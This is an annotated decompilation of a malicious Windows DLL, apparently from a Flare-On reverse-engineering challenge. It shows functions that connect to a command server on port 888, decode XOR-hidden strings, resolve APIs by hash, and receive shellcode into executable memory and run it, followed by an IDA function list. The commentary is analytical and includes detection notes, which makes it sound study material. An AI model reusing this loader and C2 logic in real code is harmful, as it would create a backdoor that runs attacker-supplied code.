/*
 * Handler for the "exe" command: acknowledges with a one-byte "#" beacon,
 * receives up to 512 bytes of second-stage payload on the already-connected
 * socket, copies them into a fresh PAGE_EXECUTE_READWRITE allocation and
 * transfers control to it.
 *
 * socket1  connected TCP socket (set up in communicate_over_socket).
 * Returns  the raw recv() result on the early-out path (recv <= 0); on every
 *          other path the function ends in an indirect call through
 *          shellc_buf, so the value returned is that callee's (see the notes
 *          at the final call).
 *
 * Hex-Rays pseudocode; the "// rax" / "[rsp+..]" comments are the
 * decompiler's register and stack annotations and are kept as-is.
 *
 * Detection note: VirtualAlloc(NULL, 512, MEM_COMMIT|MEM_RESERVE,
 * PAGE_EXECUTE_READWRITE) followed directly by an indirect call into that
 * region is the textbook in-memory shellcode staging this function performs.
 */
__int64 __fastcall beacon_to_receive_shellcode(__int64 socket1)
{
    __int64 (__fastcall *lstrlenA)(char *); // rax
    __int64 len1; // rax
    __int64 _len1; // rdi
    unsigned int (__fastcall *send)(__int64, char *, __int64, _QWORD, __int64, __int64); // rax
    void (__fastcall *closesocket)(__int64); // rax
    _BYTE *shellc_buf; // rax
    _BYTE *_shellc_buf; // rdx
    __int64 next_chunk; // rcx
    __int64 (__fastcall *recv)(__int64, char *, __int64, _QWORD); // rax
    __int64 size_received; // rax
    int index; // ebx
    __int64 (__fastcall *VirtualAlloc)(_QWORD, __int64, __int64, __int64); // rax
    __int64 v14; // [rsp+20h] [rbp-228h] BYREF
    __int64 v15; // [rsp+28h] [rbp-220h] BYREF
    char received_buf[512]; // [rsp+30h] [rbp-218h] BYREF

    /* v14 and v15 each hold the string "#": the high dword is 0x23 ('#')
       followed by three NUL bytes, so (char *)&vNN + 4 is "#" and
       lstrlenA() of it is 1. */
    LOBYTE(v14) = 0;
    HIDWORD(v14) = 35;
    /* load_func_by_hash(0, module_sel, api_hash): the value 1 is used for the
       kernel32 imports (lstrlenA, VirtualAlloc) and 4 for the Winsock imports
       (send, recv, closesocket, WSACleanup) -- inferred from usage in this
       function only, confirm against load_func_by_hash. */
    lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
    len1 = lstrlenA((char *)&v14 + 4);
    LOBYTE(v15) = 0;
    _len1 = len1;
    HIDWORD(v15) = 35;
    send = (unsigned int (__fastcall *)(__int64, char *, __int64, _QWORD, __int64, __int64))load_func_by_hash(
             0i64,
             4u,
             0xE797764u);
    /* Beacon: send(socket1, "#", 1, 0).  send() takes four arguments; the
       trailing v14/v15 are a decompiler prototype artifact, not real
       parameters. */
    if ( send(socket1, (char *)&v15 + 4, _len1, 0i64, v14, v15) == -1 )
    {
        closesocket = (void (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x939D7D9C);
        closesocket(socket1);
        /* On this path shellc_buf is the resolved WSACleanup pointer, which the
           merged indirect call at the end of the function then invokes. */
        shellc_buf = (_BYTE *)load_func_by_hash(0i64, 4u, 0x8FB8B5BD);// WSACleanup
    }
    else
    {
        recv = (__int64 (__fastcall *)(__int64, char *, __int64, _QWORD))load_func_by_hash(0i64, 4u, 0xE5971F6u);
        /* A single recv() of at most 512 bytes; whatever arrives in this one
           read is the payload -- no length prefix, no read loop, no integrity
           or authentication check on the bytes about to be executed. */
        size_received = recv(socket1, received_buf, 512i64, 0i64);
        index = size_received;
        if ( (int)size_received <= 0 )
            return size_received;               /* 0: peer closed, <0: SOCKET_ERROR */
        VirtualAlloc = (__int64 (__fastcall *)(_QWORD, __int64, __int64, __int64))load_func_by_hash(0i64, 1u, 0x697A6AFEu);
        /* 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE. */
        shellc_buf = (_BYTE *)VirtualAlloc(0i64, 512i64, 0x3000i64, 64i64);
        if ( shellc_buf )
        {
            /* Byte-for-byte copy of the `index` (1..512) received bytes into
               the RWX buffer.  `_shellc_buf[received_buf - shellc_buf]` is the
               decompiler's rendering of `received_buf[_shellc_buf - shellc_buf]`.
               Both buffers are 512 bytes and index <= 512, so the copy stays
               in bounds. */
            _shellc_buf = shellc_buf;
            do
            {
                next_chunk = (unsigned __int8)_shellc_buf[received_buf - shellc_buf];
                *_shellc_buf++ = next_chunk;
                --index;
            }
            while ( index );
        }
        /* No else branch: if VirtualAlloc failed, shellc_buf is NULL and the
           call below goes through a null pointer. */
    }
    /* Indirect call of shellc_buf with no arguments: the received payload on
       the normal path, WSACleanup() on the send-failure path, NULL if the
       allocation failed.  The two-parameter cast is a decompiler guess. */
    return ((__int64 (__fastcall *)(__int64, _BYTE *))shellc_buf)();
}
/*
 * Connects to the C2 (TCP port 888) and performs one command exchange.
 *
 * struct1  bot state (see struct _my_struct): reads formatStr and hostAddr to
 *          build the host name, writes bufReceived and, on success, mySocket.
 * Returns  1 when the peer closed without sending anything or replied with
 *          "flare-on.com" (the open socket is stored in struct1->mySocket);
 *          0 otherwise: socket/resolve/connect/send failure (socket closed),
 *          an "exe" or "run" command dispatched, a recv error, or an
 *          unrecognised reply (socket left open in the last three cases).
 *
 * Hex-Rays pseudocode; "// rax" etc. are the decompiler's annotations.
 * The checks `struct1 != (my_struct *)-448i64` below are the decompiler's
 * rendering of `&struct1->bufReceived != NULL` (bufReceived sits at offset
 * 448 in my_struct); they are always true here.
 */
char __fastcall communicate_over_socket(my_struct *struct1)
{
    __int64 (__fastcall *socket)(__int64, __int64, __int64); // rax
    SOCKET socket1; // rsi
    char result; // al
    unsigned __int64 v5; // rdi
    unsigned __int64 i; // rcx
    __int64 (__fastcall *gethostbyname)(char *); // rax
    hostent *host_val; // rax
    void (__fastcall *closesocket)(SOCKET); // rax
    __int64 (__fastcall *htons)(__int64); // rax
    unsigned int (__fastcall *connect)(SOCKET, sockaddr_in *, __int64); // rax
    __int64 (__fastcall *lstrlenA)(char *); // rax
    __int64 v13; // rax
    __int64 v14; // rbx
    unsigned int (__fastcall *send)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64); // rax
    BYTE *curr_indx; // rbx
    int v17; // eax
    BYTE *buf_rec; // rcx
    BYTE buf_bound; // dl
    BYTE *v20; // rcx
    unsigned __int8 v21; // dl
    signed __int64 v22; // r8
    __int64 v23; // rdx
    BYTE v24; // cl
    char v25[8]; // [rsp+20h] [rbp-69h] BYREF
    __int64 v26; // [rsp+28h] [rbp-61h] BYREF
    char v27; // [rsp+30h] [rbp-59h]
    int extension; // [rsp+34h] [rbp-55h] BYREF
    char v29; // [rsp+38h] [rbp-51h]
    char v30[8]; // [rsp+3Ch] [rbp-4Dh] BYREF
    int formatstr_s_s[3]; // [rsp+44h] [rbp-45h] BYREF
    char v32; // [rsp+50h] [rbp-39h]
    int v33[5]; // [rsp+54h] [rbp-35h] BYREF
    sockaddr_in sock_addr1; // [rsp+68h] [rbp-21h] BYREF
    char full_host[64]; // [rsp+80h] [rbp-9h] BYREF

    socket = (__int64 (__fastcall *)(__int64, __int64, __int64))load_func_by_hash(0i64, 4u, 0xFC7AF16A);
    socket1 = socket(2i64, 1i64, 6i64);        /* AF_INET, SOCK_STREAM, IPPROTO_TCP */
    if ( socket1 == -1i64 )                    /* INVALID_SOCKET */
        return 0;
    sock_addr1.sin_family = 2;                 /* AF_INET */
    v30[4] = 0;
    /* Two dwords XOR-decoded with 0x1D9C81A7: 0x252E7325 "%s.%" + 0x73 "s"
       -> "%s.%s". */
    formatstr_s_s[0] = 0x38B2F282;
    formatstr_s_s[1] = 0x1D9C81D4;
    v5 = 0i64;
    for ( i = 0i64; i < 2; ++i )
        formatstr_s_s[i] ^= 0x1D9C81A7u;                // "%s.%s"
    /* full_host = "<formatStr>.<hostAddr>".  full_host is 64 bytes but no
       size is passed; if to_wvsprintfA (not shown) wraps wvsprintfA the only
       bound is wvsprintfA's own 1024, so an over-long formatStr/hostAddr
       would overrun this stack buffer -- confirm in to_wvsprintfA. */
    to_wvsprintfA(full_host, formatstr_s_s, struct1->formatStr, struct1->hostAddr);
    gethostbyname = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 4u, 0xF44318C6);
    host_val = (hostent *)gethostbyname(full_host);
    if ( !host_val )
        goto LABEL_6;
    /* First resolved address copied into the 4-byte sin_addr.  h_length is
       trusted as-is; gethostbyname() returns AF_INET records (length 4) so it
       fits, but nothing here checks it. */
    memmove(&sock_addr1.sin_addr, *(const void **)host_val->h_addr_list, host_val->h_length);
    htons = (__int64 (__fastcall *)(__int64))load_func_by_hash(0i64, 4u, 0x8E9BF775);
    sock_addr1.sin_port = htons(888i64);       // port = 888
    connect = (unsigned int (__fastcall *)(SOCKET, sockaddr_in *, __int64))load_func_by_hash(0i64, 4u, 0xEDD8FE8A);
    if ( connect(socket1, &sock_addr1, 16i64) == -1 )   /* 16 == sizeof(sockaddr_in) */
        goto LABEL_6;
    /* v25 and v26 each hold the string "@" at offset 4 (dword 0x40 = '@',
       then NULs); this one-byte "@" is the hello beacon.  The extra trailing
       arguments to send() are a decompiler prototype artifact. */
    v25[0] = 0;
    *(_DWORD *)&v25['\x04'] = '@';
    lstrlenA = (__int64 (__fastcall *)(char *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
    v13 = lstrlenA(&v25[4]);
    LOBYTE(v26) = 0;
    v14 = v13;
    HIDWORD(v26) = '@';
    send = (unsigned int (__fastcall *)(SOCKET, char *, __int64, _QWORD, _QWORD, __int64))load_func_by_hash(
             0i64,
             4u,
             0xE797764u);
    if ( send(socket1, (char *)&v26 + 4, v14, 0i64, *(_QWORD *)v25, v26) == -1 )
    {
LABEL_6:
        /* Shared failure exit for resolve/connect/send: close the socket and
           fall through to `return 0`. */
        closesocket = (void (__fastcall *)(SOCKET))load_func_by_hash(0i64, 4u, 0x939D7D9C);
        closesocket(socket1);
    }
    else
    {
        curr_indx = struct1->bufReceived;
        /* One read of up to 32 bytes into the 32-byte bufReceived. */
        v17 = to_recv(socket1, (__int64)struct1->bufReceived, 32u);
        if ( v17 <= 0 )
        {
            if ( !v17 )
            {
                /* Peer closed without a command: keep the socket, report success. */
                result = 1;
                struct1->mySocket = socket1;
                return result;
            }
            /* v17 < 0: recv error; falls through to `return 0` with the
               socket still open. */
        }
        else
        {
            /* Command dispatch.  Each compare below is an inlined byte-wise
               strncmp over the first N bytes of bufReceived (the `< || >`
               test is `!=`, loop breaks on the first differing byte).  Only
               v17 > 0 was checked, so a reply shorter than N is compared
               against whatever bufReceived already contained. */
            v27 = 0;
            strcpy((char *)&extension, "exe");              // "exe"
            if ( struct1 != (my_struct *)-448i64 )
            {
                buf_rec = struct1->bufReceived;
                while ( 1 )
                {
                    buf_bound = buf_rec[(char *)&extension - (char *)curr_indx];
                    if ( *buf_rec < buf_bound || *buf_rec > buf_bound )
                        break;
                    if ( (unsigned __int64)(++buf_rec - curr_indx) >= 3 )
                    {
                        /* "exe": fetch and execute shellcode over this socket. */
                        beacon_to_receive_shellcode(socket1);
                        return 0;
                    }
                }
            }
            v29 = 0;
            strcpy(v30, "run");                             // "run"
            if ( struct1 != (my_struct *)-448i64 )
            {
                v20 = struct1->bufReceived;
                while ( 1 )
                {
                    v21 = v20[v30 - (char *)curr_indx];
                    if ( *v20 < v21 || *v20 > v21 )
                        break;
                    if ( (unsigned __int64)(++v20 - curr_indx) >= 3 )
                    {
                        /* "run": handled by to_recv_0 (not shown here). */
                        to_recv_0(socket1);
                        return 0;
                    }
                }
            }
            /* Four dwords XOR-decoded with 0x7484C069: 0x72616C66 "flar",
               0x6E6F2D65 "e-on", 0x6D6F632E ".com", 0x00000000 -> the NUL-
               terminated string "flare-on.com" (12 bytes, matching the 0xC
               compare length below).  Note: the decoded bytes are
               "flare-on.com", not "flare.com" as earlier annotations of this
               listing stated. */
            v32 = 0;
            v33[0] = 0x6E5AC0F;
            v33[1] = 0x1AEBED0C;
            v33[2] = 0x19EBA347;
            v33[3] = 0x7484C069;
            do
                v33[v5++] ^= 0x7484C069u;                   // "flare-on.com"
            while ( v5 < 4 );
            if ( struct1 != (my_struct *)-448i64 )
            {
                v22 = (char *)v33 - (char *)curr_indx;
                v23 = -(__int64)curr_indx;
                while ( 1 )
                {
                    v24 = curr_indx[v22];
                    if ( *curr_indx < v24 || *curr_indx > v24 )
                        break;
                    ++curr_indx;
                    if ( (unsigned __int64)&curr_indx[v23] >= 0xC )
                    {
                        /* "flare-on.com": C2 accepted us, keep the socket. */
                        result = 1;
                        struct1->mySocket = socket1;
                        return result;
                    }
                }
            }
        }
    }
    /* Reached from LABEL_6 (socket closed) and from the recv-error and
       unrecognised-reply paths (socket still open, never stored). */
    return 0;
}
/*
 * Derives a value from two 16-byte global XOR tables (g_xorData1, g_xorData2)
 * and selected bytes of struct_1->decryptedStr, then passes it to
 * set_registry_key.
 *
 * struct_1  bot state; only decryptedStr[8..29] is read (fixed index set,
 *           see the switch).
 * Returns   always 0.
 *
 * Layout note: reg_key1 ([rbp-28h]) and reg_key0 ([rbp-18h]) are adjacent
 * on the stack, so the 32 bytes starting at &reg_key1 are the mixed
 * g_xorData2 followed by the mixed g_xorData1.  lstrlenA(&reg_key1) measures
 * that combined buffer as a C string: it stops at the first NUL and reads
 * past the 32 bytes if neither table yields one (depends on the table
 * contents, which are not visible in this function).
 *
 * The 32-iteration switch is the decompiler's view of an unrolled loop:
 * only indices 0..0x16 do anything (default is a no-op), the decryptedStr
 * index is a fixed permutation in which 14 and 10 are each used twice
 * (cases 2/5 and 0x10/0x15), and case 0x16 XORs with the constant '@'
 * rather than an input byte.  v2, v4..v12 are table bytes the compiler kept
 * in registers; they are written back after the loop.
 *
 * Rendering note: this listing shows `&reg_key1` as `®_key1` because the
 * gist HTML-decoded `&reg`; the code is `&reg_key1`.
 *
 * Hex-Rays pseudocode; "// r8" etc. are the decompiler's annotations.
 */
__int64 __fastcall decode_and_set_keys(my_struct *struct_1)
{
    __int8 v2; // r8
    unsigned int index; // edx
    __int8 v4; // r9
    __int8 v5; // r10
    __int8 v6; // r11
    __int8 v7; // di
    __int8 v8; // si
    __int8 v9; // r14
    __int8 v10; // r15
    __int8 v11; // r12
    __int8 v12; // r13
    __int64 (__fastcall *lstrlenA)(__m128i *); // rax
    int reg_len; // eax
    int v16; // [rsp+24h] [rbp-2Ch] BYREF
    __m128i reg_key1; // [rsp+28h] [rbp-28h] BYREF
    __m128i reg_key0; // [rsp+38h] [rbp-18h]

    /* g_xorData1 bytes 0..6 are held in registers for the loop. */
    reg_key0 = _mm_load_si128(&g_xorData1);
    v2 = reg_key0.m128i_i8[6];
    index = 0;
    v4 = reg_key0.m128i_i8[5];
    v5 = reg_key0.m128i_i8[4];
    v6 = reg_key0.m128i_i8[3];
    v7 = reg_key0.m128i_i8[2];
    v8 = reg_key0.m128i_i8[1];
    v9 = reg_key0.m128i_i8[0];
    /* g_xorData2 bytes 13..15 likewise. */
    reg_key1 = _mm_load_si128(&g_xorData2);
    v10 = reg_key1.m128i_i8[15];
    v11 = reg_key1.m128i_i8[14];
    v12 = reg_key1.m128i_i8[13];
    do
    {
        switch ( index )
        {
            /* g_xorData2 bytes 0..12, XORed with decryptedStr bytes. */
            case 0u:
                reg_key1.m128i_i8[0] ^= struct_1->decryptedStr[20];
                break;
            case 1u:
                reg_key1.m128i_i8[1] ^= struct_1->decryptedStr[21];
                break;
            case 2u:
                reg_key1.m128i_i8[2] ^= struct_1->decryptedStr[14];
                break;
            case 3u:
                reg_key1.m128i_i8[3] ^= struct_1->decryptedStr[16];
                break;
            case 4u:
                reg_key1.m128i_i8[4] ^= struct_1->decryptedStr[15];
                break;
            case 5u:
                reg_key1.m128i_i8[5] ^= struct_1->decryptedStr[14];   /* same input byte as case 2 */
                break;
            case 6u:
                reg_key1.m128i_i8[6] ^= struct_1->decryptedStr[13];
                break;
            case 7u:
                reg_key1.m128i_i8[7] ^= struct_1->decryptedStr[9];
                break;
            case 8u:
                reg_key1.m128i_i8[8] ^= struct_1->decryptedStr[8];
                break;
            case 9u:
                reg_key1.m128i_i8[9] ^= struct_1->decryptedStr[11];
                break;
            case 0xAu:
                reg_key1.m128i_i8[10] ^= struct_1->decryptedStr[12];
                break;
            case 0xBu:
                reg_key1.m128i_i8[11] ^= struct_1->decryptedStr[25];
                break;
            case 0xCu:
                reg_key1.m128i_i8[12] ^= struct_1->decryptedStr[23];
                break;
            /* g_xorData2 bytes 13..15 (v12, v11, v10). */
            case 0xDu:
                v12 ^= struct_1->decryptedStr[28];
                break;
            case 0xEu:
                v11 ^= struct_1->decryptedStr[27];
                break;
            case 0xFu:
                v10 ^= struct_1->decryptedStr[29];
                break;
            /* g_xorData1 bytes 0..5 (v9..v4). */
            case 0x10u:
                v9 ^= struct_1->decryptedStr[10];
                break;
            case 0x11u:
                v8 ^= struct_1->decryptedStr[18];
                break;
            case 0x12u:
                v7 ^= struct_1->decryptedStr[24];
                break;
            case 0x13u:
                v6 ^= struct_1->decryptedStr[19];
                break;
            case 0x14u:
                v5 ^= struct_1->decryptedStr[22];
                break;
            case 0x15u:
                v4 ^= struct_1->decryptedStr[10];   /* same input byte as case 0x10 */
                break;
            /* g_xorData1 byte 6: XORed with a constant, not with input. */
            case 0x16u:
                v2 ^= '@';
                break;
            default:
                break;                              /* 0x17..0x1F: untouched */
        }
        ++index;
    }
    while ( index < 32 );
    /* Write the register-held bytes back into the two tables. */
    reg_key0.m128i_i8[6] = v2;
    reg_key0.m128i_i8[5] = v4;
    reg_key0.m128i_i8[4] = v5;
    reg_key0.m128i_i8[3] = v6;
    reg_key0.m128i_i8[2] = v7;
    reg_key0.m128i_i8[1] = v8;
    reg_key0.m128i_i8[0] = v9;
    reg_key1.m128i_i8[15] = v10;
    reg_key1.m128i_i8[14] = v11;
    reg_key1.m128i_i8[13] = v12;
    /* 48 is passed by address to set_registry_key; its meaning (type, size,
       ...) is determined by that function, which is not shown here. */
    v16 = 48;
    lstrlenA = (__int64 (__fastcall *)(__m128i *))load_func_by_hash(0i64, 1u, 0x2D40B8E6u);
    reg_len = lstrlenA(&reg_key1);
    /* Length passed is strlen + 1, i.e. including the terminating NUL. */
    set_registry_key(struct_1, (__int64)&reg_key1, reg_len + 1, (__int64)&v16);
    return 0i64;
}
l3rlcps_7r_vb33eehskc3 |
1000;DllMain | |
1010;Start | |
1020;check_dll | |
1120;func_load_checks | |
1210;fetch_new_dll_names | |
12c0;load_func_by_hash | |
1370;to_load_func_by_hash | |
1380;initialize_dll_names | |
18e0;sub_1800018E0 | |
1990;_Start | |
1a40;to_png_and_socket | |
1e60;init_inactive_strings | |
1f80;to_communicate_over_socket | |
2070;communicate_over_socket | |
2410;beacon_to_receive_shellcode | |
2590;on_command_run | |
2730;decode_and_set_keys | |
2a20;set_registry_key | |
2ce0;to_recv | |
2d30;to_wvsprintfA | |
2d80;get_system_date_format | |
2e60;to_name_check | |
2f70;maybe_aes_stuff | |
33e0;__security_check_cookie | |
3404;dllmain_crt_dispatch | |
3454;dllmain_crt_process_attach | |
3580;dllmain_crt_process_detach | |
3604;dllmain_dispatch | |
36fc;dllmain_raw | |
3750;section:_[.text] | |
3790;__raise_securityfailure | |
37c4;__report_gsfailure | |
3898;__report_rangecheckfailure | |
38ac;__report_securityfailure | |
3948;capture_current_context | |
39b8;capture_previous_context | |
3a2c;__scrt_acquire_startup_lock | |
3a68;__scrt_dllmain_after_initialize_c | |
3a9c;__scrt_dllmain_before_initialize_c | |
3ab4;anti_vm | |
3adc;__scrt_dllmain_crt_thread_detach | |
3af4;__scrt_dllmain_exception_filter | |
3b58;__scrt_dllmain_uninitialize_c | |
3b88;__scrt_dllmain_uninitialize_critical | |
3b9c;__scrt_initialize_crt | |
3be8;__scrt_initialize_onexit_tables | |
3cb4;__scrt_is_nonwritable_in_current_image | |
3d50;__scrt_release_startup_lock | |
3d74;__scrt_uninitialize_crt | |
3da0;_onexit | |
3df0;atexit | |
3e08;__security_init_cookie | |
3eb4;_InitializeSListHead | |
3ec4;sub_180003EC4 | |
3ed0;sub_180003ED0 | |
3ed8;sub_180003ED8 | |
3ee0;__scrt_initialize_default_local_stdio_options | |
3efc;sub_180003EFC | |
3f04;sub_180003F04 | |
3f0c;__scrt_fastfail | |
4054;_RTC_Initialize_0 | |
40a0;_RTC_Initialize_0_0 | |
40ec;j__guard_check_icall_nop | |
40f4;__isa_available_init | |
42bc;__uncaught_exception | |
42d0;strrchr | |
4410;__C_specific_handler | |
460c;__vcrt_initialize | |
4640;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores | |
4654;__vcrt_thread_detach | |
4668;__vcrt_uninitialize | |
4688;__vcrt_uninitialize_critical | |
4698;__std_type_info_destroy_list | |
46e0;memset | |
4890;_local_unwind | |
48c0;_NLG_Notify | |
48f0;__NLG_Return2 | |
48f4;_guard_check_icall_nop | |
48f8;__vcrt_freefls | |
4918;__vcrt_freeptd | |
4968;__vcrt_getptd_noexit | |
4a20;__vcrt_initialize_ptd | |
4a60;__vcrt_uninitialize_ptd | |
4a84;__vcrt_initialize_locks | |
4acc;__vcrt_uninitialize_locks | |
4b04;try_get_function | |
4ccc;__vcrt_FlsAlloc | |
4d20;__vcrt_FlsFree | |
4d74;__vcrt_FlsGetValue | |
4dc8;__vcrt_FlsSetValue | |
4e30;__vcrt_InitializeCriticalSectionEx | |
4ea8;__vcrt_initialize_winapi_thunks | |
4ef4;__vcrt_uninitialize_winapi_thunks | |
4f34;__vcrt_initialize_pure_virtual_call_handler | |
4f58;__crt_strtox::is_overflow_condition_ulong_ | |
4f84;unknown_libname_10 | |
4f98;__crt_strtox::parse_integer_ulong | |
52ac;_LocaleUpdate::_LocaleUpdate | |
533c;_wtol | |
5368;j__malloc_base | |
5370;strnlen | |
54cc;strncpy_s | |
55a0;_initterm | |
5618;_initterm_e | |
5664;_seh_filter_dll | |
5678;_seh_filter_exe | |
5808;dyntls_init_exception_filter | |
5814;common_exit | |
5980;exit_or_terminate_process | |
59cc;try_cor_exit_process | |
5a38;sub_180005A38 | |
5a40;_cexit | |
5a50;_exit | |
5a5c;sub_180005A5C | |
5a64;parse_command_line_char_ | |
5c20;__acrt_allocate_buffer_for_argv | |
5c84;_configure_narrow_argv | |
5dfc;common_initialize_environment_nolock_char_ | |
5e68;create_environment_char_ | |
5f64;unknown_libname_11 | |
5fa8;sub_180005FA8 | |
5fc4;sub_180005FC4 | |
5fe0;__dcrt_uninitialize_environments_nolock | |
6018;common_initialize_environment_nolock<char> | |
6020;__crt_seh_guarded_call_int_::operator | |
605c;__crt_seh_guarded_call<int>::operator | |
61fc;_lambda_4e60a939b0d047cfe11ddc22648dfba9_::operator | |
63d8;sub_1800063D8 | |
63e8;_execute_onexit_table | |
6424;_initialize_onexit_table | |
6464;_register_onexit_function | |
64ac;initialize_global_variables | |
64c0;initialize_c | |
64e4;__vcrt_uninitialize_critical_0 | |
64f4;initialize_pointers | |
6548;sub_180006548 | |
6550;uninitialize_allocated_memory | |
65e0;sub_1800065E0 | |
65e4;__acrt_initialize | |
65f8;Concurrency::details::ScheduleGroupSegmentBase::HasUnrealizedChores | |
660c;__vcrt_uninitialize_critical_1 | |
661c;__acrt_uninitialize | |
6630;__vcrt_uninitialize_critical_2 | |
6640;terminate | |
6668;_free_base | |
66a8;_malloc_base | |
6708;strcpy_s | |
6768;abort | |
67c0;_calloc_base | |
6838;__acrt_call_reportfault | |
6994;sub_180006994 | |
699c;_invalid_parameter | |
6a44;_invalid_parameter_noinfo | |
6a64;_invoke_watson | |
6aac;__acrt_errno_from_os_error | |
6af4;__acrt_errno_map_os_error | |
6b44;__doserrno | |
6b64;_errno | |
6b84;__pctype_func | |
6bb4;_isctype_l | |
6cc4;__crt_seh_guarded_call_void_::operator | |
6d24;__crt_seh_guarded_call<void>::operator | |
6d6c;__crt_seh_guarded_call<void>::operator | |
6dac;__crt_seh_guarded_call<void>::operator | |
6dec;construct_ptd_array | |
6ebc;Concurrency::details::SchedulerProxy::DeleteThis | |
6edc;destroy_ptd_array | |
6fd4;replace_current_thread_locale_nolock | |
703c;__acrt_freeptd | |
7080;__acrt_getptd | |
7114;__acrt_getptd_noexit | |
71b4;__acrt_initialize_ptd | |
71f0;__vcrt_uninitialize_ptd_0 | |
7214;__acrt_update_locale_info | |
7248;__acrt_update_locale_info_0 | |
727c;__acrt_set_locale_changed | |
7288;__acrt_uninitialize_locale | |
72d0;__vcrt_initialize_locks_0 | |
7318;sub_180007318 | |
7334;__vcrt_uninitialize_locks_0 | |
736c;sub_18000736C | |
7388;try_get_function | |
7528;__acrt_FlsAlloc | |
7580;__acrt_FlsFree | |
75d8;__vcrt_FlsFree_0 | |
7630;__acrt_FlsSetValue | |
7698;__acrt_InitializeCriticalSectionEx | |
7710;__acrt_LCMapStringEx | |
7800;__acrt_LocaleNameToLCID | |
7868;__acrt_initialize_winapi_thunks | |
78a0;__acrt_is_packaged_app | |
7928;__acrt_uninitialize_winapi_thunks | |
796c;unknown_libname_12 | |
7980;common_expand_argv_wildcards_char_ | |
7b8c;copy_and_add_argument_to_buffer_char_ | |
7c9c;expand_argument_wildcards_char_ | |
7e48;unknown_libname_13 | |
7f10;common_expand_argv_wildcards<char> | |
7f18;__crt_seh_guarded_call<void>::operator | |
7f50;_lambda_ad1ced32f4ac17aa236e5ef05d6b3b7c_::operator | |
8168;getSystemCP | |
81e8;setSBCS | |
8278;setSBUpLow | |
845c;setmbcp_internal | |
8614;__acrt_initialize_multibyte | |
863c;__acrt_update_thread_multibyte_data | |
86fc;_setmbcp_nolock | |
89a4;x_ismbbtype_l | |
8a1c;_ismbblead | |
8a30;__acrt_initialize_command_line | |
8a58;__dcrt_get_narrow_environment_from_os | |
8b5c;j__recalloc_base | |
8b64;_recalloc_base | |
8bfc;__acrt_initialize_heap | |
8c18;sub_180008C18 | |
8c24;initialize_inherited_file_handles_nolock | |
8d10;initialize_stdio_handles_nolock | |
8e0c;__acrt_initialize_lowio | |
8e48;__acrt_uninitialize_lowio | |
8e88;__acrt_execute_initializers | |
8f1c;__acrt_execute_uninitializers | |
8f6c;sub_180008F6C | |
8f74;_callnewh | |
8fb4;_query_new_handler | |
8fe8;__crt_seh_guarded_call_void | |
9030;__acrt_get_sigabrt_handler | |
9060;_initp_misc_winsig | |
9080;raise | |
931c;__acrt_has_user_matherr | |
933c;sub_18000933C | |
9344;__acrt_invoke_user_matherr | |
938c;sub_18000938C | |
9394;_mbtowc_l | |
94dc;mbtowc | |
94e4;_fileno | |
950c;__acrt_initialize_stdio | |
962c;__acrt_uninitialize_stdio | |
9688;sub_180009688 | |
9694;sub_180009694 | |
96a0;_isleadbyte_l | |
96e0;__acrt_GetStringTypeA | |
9894;__acrt_add_locale_ref | |
9920;__acrt_free_locale | |
9ac0;__acrt_locale_free_lc_time_if_unreferenced | |
9af8;__acrt_locale_release_lc_time_reference | |
9b20;__acrt_release_locale_ref | |
9bc8;__acrt_update_thread_locale_data | |
9c38;_updatetlocinfoEx_nolock | |
9ca0;__free_lconv_mon | |
9dac;__free_lconv_num | |
9e18;free_crt_array_internal | |
9e70;__acrt_locale_free_time | |
9f78;GetTableIndexFromLocaleName | |
a040;__crtDownlevelLocaleNameToLCID | |
a080;shortsort | |
a150;qsort | |
a484;unknown_libname_14 | |
a524;_mbsdec | |
a52c;_mbsdec_l | |
a5c4;initialize_multibyte | |
a5dc;__acrt_LCMapStringA_stat | |
a938;__acrt_LCMapStringA | |
a9d0;_msize | |
aa0c;_realloc_base | |
aa90;__acrt_lowio_create_handle_array | |
ab28;__acrt_lowio_destroy_handle_array | |
ab78;__acrt_lowio_ensure_fh_exists | |
ac30;__acrt_lowio_unlock_fh_0 | |
ac54;__acrt_lowio_unlock_fh_0_0 | |
ac78;_free_osfhnd | |
ad34;_get_osfhandle | |
adac;_isatty | |
ae0c;__acrt_stdio_flush_nolock | |
ae84;_fflush_nolock | |
aed0;_flushall | |
aedc;common_flush_all | |
afc0;_fcloseall | |
b074;__acrt_stdio_free_buffer_nolock | |
b0b4;__strncnt | |
b0cc;sub_18000B0CC | |
b0d4;__crt_seh_guarded_call<int>::operator | |
b160;_commit | |
b1f4;write_double_translated_ansi_nolock | |
b3fc;write_text_ansi_nolock | |
b504;write_text_utf16le_nolock | |
b620;write_text_utf8_nolock | |
b794;_write | |
b880;_write_nolock | |
bb70;log10 | |
c11c;common_lseek_nolock___int64_ | |
c1b8;common_lseek_nolock<__int64> | |
c1c0;_fclose_nolock | |
c244;ftell | |
c2b0;_putwch_nolock | |
c30c;_call_matherr | |
c374;_exception_enabled | |
c430;_handle_error | |
c560;__acrt_initialize_fma3 | |
c5d0;_log10_special | |
c5f0;_log_special_common | |
c688;__crt_seh_guarded_call<int>::operator | |
c6fc;_close | |
c7a0;_close_nolock | |
c85c;__acrt_stdio_free_stream | |
c8a0;__dcrt_lowio_initialize_console_output | |
c8dc;__dcrt_terminate_console_output | |
c910;_get_fpsr | |
c920;_set_fpsr | |
c92a;_fclrf | |
c95c;_return | |
c960;_raise_exc | |
c988;_raise_exc_ex | |
cc90;_set_errno_from_matherr | |
ccc0;_clrfp | |
cce0;_ctrlfp | |
cd5c;_set_statfp | |
cd7c;_statfp | |
cd8e;IsProcessorFeaturePresent | |
cd94;RtlUnwindEx | |
cda0;_FindPESection | |
cdf0;_IsNonwritableInCurrentImage | |
ce40;_ValidateImageBase | |
ce70;__GSHandlerCheck | |
ce90;__GSHandlerCheckCommon | |
cf00;_alloca_probe | |
cf70;memmove | |
d3c0;memcmp | |
d4a0;_guard_dispatch_icall_nop |
structure: | |
/*
 * Bot state block passed to communicate_over_socket and decode_and_set_keys.
 *
 * Offsets in the comments assume MSVC default (natural) alignment on x64;
 * they agree with the `struct1 != (my_struct *)-448i64` checks in
 * communicate_over_socket, which are `&struct1->bufReceived != NULL` with
 * bufReceived at offset 448.  Field names beyond what those functions
